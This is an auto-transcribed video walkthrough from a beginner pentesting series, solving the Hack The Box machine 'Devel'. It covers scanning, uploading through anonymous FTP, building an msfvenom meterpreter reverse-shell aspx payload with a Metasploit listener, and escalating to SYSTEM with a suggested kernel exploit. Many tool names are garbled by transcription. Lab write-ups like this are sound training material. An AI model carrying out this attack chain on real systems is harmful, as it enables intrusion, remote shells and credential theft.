Pentesting for n00bs: Episode 4 - Devel

Key Takeaways

heyo its episode four what's up my new band girls we are going to be working on a machine today called devil de ve el not IL now this is a nice machine to take a step up we've been mostly learning about SMB exploitation today we're gonna be learning a little bit more about shellcode generation and how we can do a little bit of enumeration and let's just let's not talk about it yet let's do our our first thing first kind of deal let's go ahead and spin up that machine right and let's go ahead and start our M map skin so I must our new window here and we're gonna do an map T for - a P and again for the second video in a row I've already forgotten what the IP address is its top five we're gonna scan dot five and we will let that scan so in my common stalling tactic let's talk about the Machine a little bit more in detail what we're gonna be seeing today is a machine that is very common at least at the beginner levels of hack the box now the exploitation type isn't really as common but what what you're gonna see is you're going to see a very common port combination something along the lines of port 21 and port 80 you see that a lot where you have a website and you have port 21 or you might have port 22 in port 80 and you have to leverage and exploit somewhere in order to get somewhere else and you're gonna see that here in a minute now if you remember back to episode 2 we talked about FTP remember we had FTP in our machine it was it was lame right we did lame and we had FTP and I talked about the staging process about having to need a place to execute an exploit and you're gonna see that coming to play today how can we leverage FTP if we have anonymous access and how how can we enumerate what is in front of us so we're gonna go ahead and just let the scan finish really quick and then once the scan finishes we're gonna be be looking at it and we'll talk further into detail ok the scan has returned so let's take a look here and as I kind of discussed we have port 21 and we have port 80 here now there is a little bit of information that is being disclosed to us here you can see that we have Microsoft I is 7.5 why do we know that well because they're putting it in their headers now on a vulnerability assessment or a pen test this is a no no this is a information disclosure it's a low finding it's very low but all this is here is information disclosure right it's information gathering for us we want to avoid this if we can same thing with the site title is now that's beginning to tell me just from experience that we're probably looking at a default web page that the title is going to be is 7 on the other front here we see that there is FTP open with anonymous login and we can see there are some files in here that to me the experienced I look as if they are an IAS a directory write a web root directory so what we're looking at is an honest login which again is probably a no-no right why why are we allowing people to log in anonymously unless there's a very very good reason for this this is probably a ding on an assessment as well if we scroll down through the rest it's gonna take some guesses at the operating system it's not a phone so again this doesn't really come through that great I got some tracer out nothing nothing fancy so we're gonna focus here so what it looks like here is we have website and we've got FTP so my enumeration for a website first things first the first thing I like to go do is I like to go out to the website and we'll just go to 1010 10.5 and you see that it is in fact a default web page if we were to click on this it would go to to Microsoft's website now you see this a lot during pen testing okay when we're doing pen testing we come across these default web pages a lot now this signifies one of two things one they have a website out in the open and they have it running on the back end somewhere at a different directory right there's probably a directory to this to a web page to running and it may resolve to a domain name let's just say Google it may be like dev Google com is where they're running on this web server but when you just navigate to port 80 or 443 the default web page is still here this is a finding on a pen test as well this signifies that there is poor hygiene right if we're seeing this and the other the other thing I should mention too is the other part of this is okay potentially you're not even running website they are just they just have is on for whatever reason again same thing poor hygiene as an attacker if I'm seeing default web pages that makes me think okay what other things have you forgot to turn off are you a lazy person a lazy engineer on the other side that I'm up against why am i seeing these kinds of things so because of this it makes me really inquisitive right and when I see default web pages I think okay there's probably a reason that it's up there if there is then there's probably a hidden directory somewhere so my first thought is in this instance is I'm going to look for extra directories and my favorite tool for that is called der Buster now let's go ahead and open up a new tab now doorbuster stands or is short for directory busting and what we're doing is we're going to brute course directories here so we'll save directory one directory to director III right we'll just try to go through a whole list of directories that we provide and see if any of them come back now we may be able to find some hidden information especially in capture-the-flag type stuff and in real world situations where you run into this so let's go ahead and type in der Buster now I like to do dirt buster and like this start its own process okay another thing that I should note is there are other tools that we can use der Buster's my favorite a lot of people are big on go Buster right now I haven't jumped on that train I've used it sometimes and it works very well the other one that people like is called Derb dir b you can use either of those as well and be successful here so what I'm gonna do is I'm just going to copy the web address and should paste in here it actually didn't okay so we'll have to type in HTTP double dot slash slash and it likes the port 80 at the end like that okay on top of this I like to use more threads because we get to go faster when we do that so on top of that we need a word list here's our wordless area now Kali is very nice if you go to the base here there is a user folder share and then if you start typing word lists like what you find there is a word list folder so again user share wordless inside of that is der Buster here and then there's word list now the one I like to use is the medium but for this instance we're just gonna use small and in some cases if you're really got a lot of time there is a big word list out on github if you search for der buster big word list somebody has made one so let's go ahead and select this word list now if we come down to the bottom down here what we're gonna be looking at we're gonna brute first directories files we're gonna be recursive that means we find something we're gonna we find one directory we're going to go ahead and go on and try to find more directories inside that directory so this is great the one thing that we're gonna do here is though PHP is not over searching for now this this is a Windows machine right in highly probability that we're running against a Windows machine because we're running against Microsoft is and we're gonna be running against ASM ASM X file extensions ASP aspx file extensions probably higher more probability right than we are gonna be PHP if this were an Apache web server for example then we would be using a PHP extension but in this instance I'm gonna hedge my bet that it's not so we're gonna go ahead and say something along the lines of ASM comma ASM X comma ASP comma aspx now that will search for all four extensions on top of this I always like to add in some other stuff when I'm doing this in a real world assessment like a text file like a zip file backup file RAR file a sequel database etc you can make this list longer the longer you make this list the longer it's gonna take especially if it starts finding directories now let's go ahead and hit start on this guy now I'll be honest I have actually not run directory busting on this I am just showing you my methodology when I see a webpage and especially when I see something like this now my I my trained eye would actually go right here to FTP okay so FTP I am seeing ASP underscore client I'm seeing is start HTM and I'm seeing welcome dot PNG we do a view page source we come into here and we see what welcome PNG right so we could probably replace this file with a picture of something else if we wanted to we can just go out to the web and we can go to Google and let's just say something like a cute dog right we'll take the cute dog let's go find an image of one and let's say I want to a JPEG so okay this one's a JPEG I'm just gonna go ahead and save that image out to my desktop and we'll just call it we'll call it dog jpg oops okay dog jpg all right and this is just a proof of concept here that we are in indeed in a web folder so let's go ahead and do this blow it up I'm gonna change to my desktop since that's where I put the file and then look ftp over to this web or this this machine i should say now it's gonna ask for a name and we saw that anonymous login work so we're just gonna do anonymous anonymous okay and then we have commands i could say help and you got a lot of commands very similar to linux you could say LS PWD okay you can see what directories you have access to now we could enumerate this we could go into this asp net underscore client and see if there's any files in here dig deeper get information out of it just to save time purposes I'm not gonna do that but just know that that's perfectly okay in terms of enumeration so here let's go ahead and just do a put this just means we're gonna put something onto the server I'm gonna put dog jpg onto the server LS looks like it's there nice okay so now if we come here and we say forward slash dog jpg I don't know what happened to my wonderful picture but my wonderful picture is somewhat there so we know that it worked right we could put a text file there whatever okay why is this important well this is important because we talked about this two episodes ago I can put things into this folder but unless I have a second chain of where I can have somebody execute them or I can execute them myself then FTP really isn't that vulnerable to me but what do we just do what we just came in here and we executed this file right we access this file the server read this file and we've executed it so what's stopping us then from putting malware onto this and doing the same thing and that's really what I'm after I want to put some malware onto this machine and I want to exploit it right so we're gonna do that right now so what we can do is we can use a tool called MSF venom in the last episode we very very briefly talked about MSF venom and one thing that you can do is if you ever need a cheat sheet you can just go out to Google and you could say MSF venom and know this is like you can see chichi right here you can do something like a SPE X and just find something particular like this is one that I've been to in the past you could look at these cheat sheets here there's a high on coffee cheat sheet as well there's a bunch in here that'll tell you like hey if you're doing it against a Windows machine or hey here's ASP right here and this is really what we're after right because we know that they run ASP aspx as an is server so this is the type of file we're gonna need now this were an Apache server okay maybe we need an Apache payload right or if it's JSP or if we're using Tomcat then we're gonna do a war file and we have a bunch of different cheatsheet payloads here this is perfect so what we're gonna do is we're going to generate a payload so all we're doing is generating malware we are generating something that is going to say hey I'm listening on this connection use this payload here right and this payload is going to be a meterpreter payload remember that I told you in the last episode that if I have the opportunity I will use the meterpreter payload we also could just use a generic Windows exploit payload here but what we're going to do is we're going to use this the payload and we're going to exploit it okay so this payloads gonna say hey use this payload contact back to me reverse shell right contact back to me at my listening host at my listening port and then let's set a file type in the shell so let's go ahead and type this out and then we'll talk about it in more detail so we're gonna do MSF venom and we're gonna do a - P for payload and this payload should look familiar to you right windows meterpreter and then we're gonna say a reverse TCP okay now we don't know if this house is going to be a 32-bit or 64-bit so let's start with a 32-bit if we need to improve the payload we can alright so let's do this we'll say L host and then we need our IP address - 10 10.14 dot 24 we need a listening port we're just going to use all fours for now and then we are going to say a file type so I'm going to say aspx you could also do ASP that'll be fine but ASP X and then what we're going to do is we're going to put this all into a file ok we could just call this e^x aspx now if we didn't add this into a file here then this would print out shell code for us and we're not we're not at that level right now we're printing out copying and putting in two things we need this to be in to its own aspx file so when we execute it it runs the command that it needs to and it knows that based on the file type and the server we're putting it on is appropriate for this aspx file type okay so we're gonna hit enter now it's gonna take a second to generate and it's gonna put it on the desktop is where we had it and then once it generates we need to do one other thing we need to now open up one more new tab and then I'm going to go into Metasploit MSF console follow along with this and we're gonna run that exploit handler now you saw all this in the last episode you just saw it done for us now we're gonna do this ourselves okay so let's say use exploit multi handler now we really haven't gotten into netcat yet but when we do this is very similar to netcat we are just listening right all we're doing is saying open up a listener and on this port talk back to me at this IP address and we're just be listening on that port so let's go ahead and just say options you're gonna see that there's literally nothing in here so what we're gonna have to do is we're gonna have to set a payload so the payload has to be identical to what we just generated so that's going to be payload of Windows and you should be able to auto tab is just a little slow meterpreter and then we've got reverse underscore tcp options again okay now let's set the l host to your IP address you're listening host the port has to match as well all fours is default that's perfect that's what we chose let's go ahead and run this and now we're just gonna let this sit here and it's gonna run and listen okay so coming back to here I bet we've lost our connection let's see if we have we have okay let's say bye and connect again anonymous anonymous now let's go ahead and put that e^x aspx file on here we did it perfect another thing that I should note too is we are likely transferring via ASCII right now ASCI I preferably we should transfer via binary so you would type binary and then transfer your file I think it's okay but if you ever run into issues with FTP and you're transferring a file or a payload and it's not working try switching to binary and then transferring the file again and seeing if that fixes anything I've had to happen in pass it's better to use binary over asking okay so we know how to call outright we've got a listener going we've got our malware uploaded and so we're waiting here for a connection now we need to engage that malware and make the server execute it so aspx EXA SPX here hit enter okay it engaged and look we just got a session that easy okay so we say sis info x86 meterpreter we won the lottery there we got the right right system on everything okay x86 meterpreter architecture x86 windows 7 build and then we say get UID crack we are not Authority system darn it so we can't do things like hash dump right now right we are not we're not system now there is a tool that we can try to use called get system hit enter didn't work that's ok sometimes you get win from this but do note that in a rare occasion that actually can crash a machine if you're doing a pen test so be very careful but one of the favorite things that I want to show you and I talked about it last time is there our post modules in motor pretermit our session is we can actually background the session and then we can say let's search for this we'll say search suggester like this and there's only one but look this is a post module here so let's copy this and we're gonna say use paste this hit enter and then let's look at our options now and look what it's gonna ask for it's gonna say hey all I need is this session because you already have a session so just give me that and I'll I'll access that session and we'll do a little bit of enumeration so this is post exploitation enumeration okay so we're gonna say set session to 1 then we're gonna run this and what this is gonna do is this is gonna look through all the x86 exploits that it knows of that are privileged escalation exploits it's gonna compare what's going on in the Windows system and say hey yeah that might be good for this or no that's not gonna work and then it's gonna return a list of those that will possibly work for us okay and this will only take a minute and then what happens is we're gonna go through this list and we're gonna say okay I'm gonna try the first one or the second one or the third one and we're just gonna keep going until we know you know if it's vulnerable look I mean you're coming through so best scenario for us here is we've got one two three four five we could go through this whole list if we're desperate the one that I like to use we could use this bypass Event Viewer let's just go straight for the win here I believe get your pods gonna work get your pods pretty friendly so let's go ahead and say use paste now I'm gonna show you something let's type in options okay let's set the session to 1 and look it already has our target as Windows 7 that's fine x86 perfect so our session is good and let's type in options again okay look at the screen remember the screen see what happens now let's hit run this is not going to work okay we launched we launched a process we did not get a reverse shell back let's type in options again look what changed now payload options are in here why didn't this work well for me it always tends to default back to my Ethernet interface I don't know why it does this so you could without seeing the screen if you keep it in the back of your mind you could just say hey I know that I need my l host to be 10 10.14 dot 24 and you know what I know I'm already on a L port of all fours so I'm already listening or I've already used that port up let's do something different let's set the L port to 4 4 4 5 it's fine right let's look at our options now ok and now let's try running this and let's see if we if we can get this to work so and it might take a second from the first exploitation it might might take a second here okay and what has happened I've lost my session so let's go ahead and I'm gonna control see here what we need to do is we need to set up another listener and we probably just tab up a little bit there we go and then say options here okay so I'm gonna run this again we just need to execute that payload sometimes your listener dies hopefully you're a little bit more fortunate than me and yours didn't you can see now that we've generated again we've got the shell we'll be quick about this so go back round you tab up a few times we've got the kit your pod in there already set the session to two instead of one because our new session is session two and then we'll set options and now let's go ahead and run it and it's possible that we killed our session with the the failed attempt there what I actually believe happens is that it goes it tries to connect and then it you potentially lose your session because it closes out the other one to exploit into the the new one so let's try this one here okay and now we ran the session and we're okay so if you lost your session like me showing you proof of concept no in the back of your mind that hey I probably want to set an L port on these prep esque or an L host as well in these pre basket temps and then let's go ahead and say get UID and you can now see that where Authority system so same thing as before we can do a hash dump look at the hashes we can go grab the the root the user whatever the flags on those not going to show you to do that we can load modules you've seen that over and over right this is kind of coming becoming repetition so this is a great way of doing this my challenge to you is look into payloads okay I don't know what the command is I believe it's MSF venom l might not be L there is a payload option in here that lists out all the payloads [Music] okay let's do a - I'll pay loads then and it'll list all the payloads my suggestion is to go back into this machine and instead of running meterpreter try running a Windows reverse TCP payload or something along those lines see all these windows meterpreter let's skip those just run a Windows reverse TCP shell reverse TCP which is right here try doing that as your paella okay and with that as your payload you don't have to use meterpreter so what you can do is instead you can just say hey I'm not gonna use the exploit handler I'm gonna say netcat MB LP imma listen on port all for us here and then just wait for a session to come across and that's it okay so my challenge to you is to redo this exploit using it manually as opposed to using Metasploit and meterpreter and see what your results are so a little bit of homework but that is it for this episode so we we took our our skin we looked at some things and we could check real quick on the on the dirt Buster like I said I've never ran it before and it hasn't found anything and that's fine it finished the request so you know it's always good to do directory busting it's also good to run nikto if this were actually a website we'll get to nikto at some point but if this were a website good to run nikto as well directory busting of course inspect the website but here it was really apparent that to a trained eye that ftp was the way to go because we had execution here we did a proof of concept with the the dog JPEG and then we were able to generate with MSF enim a payload and then execute it here and get a shell and then we also went in and we were able to use the exploit suggester and use that to get another shell this may be a lot of information right this is some some new tricks that I'm throwing at you please rewatch the video please try it on your own as well take everything and try the manual way and then try it again this way as well see if you can repeat all the steps without watching the video just using your notes it's always good to have a good notebook so if you're not doing that already go ahead and start doing that now but that is it for this lesson I am TCM until the next one I really do thank you for joining me [Music]